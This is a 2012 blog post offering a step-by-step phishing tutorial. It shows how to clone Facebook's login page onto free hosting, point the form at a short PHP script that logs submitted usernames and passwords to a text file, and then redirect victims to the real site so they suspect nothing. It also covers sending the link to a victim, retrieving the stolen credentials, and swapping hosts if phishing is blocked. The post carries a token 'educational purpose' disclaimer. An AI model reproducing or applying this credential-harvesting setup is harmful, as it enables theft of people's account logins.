Translate

Friday, November 9, 2012

Phishing Tutorial

Phishing is something which you all might be pretty aware of.
 According to wikipedia:

Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.[1]

Phishing is typically carried out by e-mail spoofing[2] or instant messaging,[3] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[4] and exploits the poor usability of current web security technologies.[5] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing,[6] probably influenced by phreaking,[7][8] and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.


Now, let's learn how carry out Phishing.

So now, lets start demonstration of phishing with one of your favorite 
social networking website or emailing website. There are many more, and
this method will be apply to each and everyone like gmail.com, yahoo.com,
live.com, hotmail.com, facebook.com, twitter.com, flicr, mail.com, 
rediffmail.com, in.com and rest of the websites which provide these services.
 
For this Tutorial, I recommend you to use Firefox web browser. 
 
Step-1:- Register to any website hosting website. The websites which provide 
cpanel for websites are recommended. There are many web hosting websites which
 provide free website hosting services.


One such website is http://x10hosting.com
There are plenty such out there. Initiate Googleing and you'll get plenty as
such. 
 
Step-2:- Go to the target site. In our case, it's everyone's favourite-
 facebook.com . Then press Ctrl+U or right click the page and select 
view source. Simply copy-paste ( Ctrl+C and Ctrl +V) the given code into a 
notepad file.
 
Step-3:- Save the notepad file with name "index.html" in a new folder.


Step-4:- Open any editor ( in our case it's notepad) and copy-paste the code 
given below:
 
<?php
header ('Location: http://www.facebook.com/');
$handler = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
 
exit;
?> 


Save the file containing the above code with "anyname.php". Here, we'll 
save it with name "login.php". But, make sure that the file is saved with
.php extension as the given code is a php code. In this code, in line
$handler = .... there's a word in inverted commas i.e "log.txt". Change it
to any unguessable name. Like asertf1324.txt. But, here we'll keep the name
login.txt unedited for the sake of convenience. 


Step-5:- Regarding file previously saved file i.e "index.html", open it using
notepad. Press Ctrl+F (for find) and search word "action" in the page of code.
Here, you'll see a line similar to action="https://facebook.....". Remove the
whole line which is under the quotes and replace it with "login.php" (change it
to the unguessable name decided previously). Save and exit.


Step-6:- Upload both the files i.e "index.html" and "login.php" in the manager
directory of your control panel.
 
 
(Looks and method of upload may vary depending on your website host)
 
Step-7:- Open your sub-domain, the one you had chosen while registration.
Eg- yourname.x10hosting.com. You'll see the fake login page of the website.
(In our case- facebook.com). Send the link to your friend/victim. Once he/she
enters his/her username and password it will be stored in login.txt file.
AND Do you know the beauty of this code? The beauty is that the victim after
entering his/her username and password will be directed to the Original 
facebook page. So, the victim will, in no way have an inkling of doubt. 
If you are making the phishing page other than facebook.com, replace 
header ('Location: http://www.facebook.com/') to
header ('Location: othersite.com').


Step-8:- Now go to yoursite.x10hosting.com/log.txt and you'll find the username
and password of the victim.


NOTE: Sometimes x10hosting doesn't support phishing. Use another free website
provider in that case.

DISCLAIMER: THIS IS FOR EDUCATIONAL PURPOSE ONLY AND IN NO WAY SHOULD BE MISUSED.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)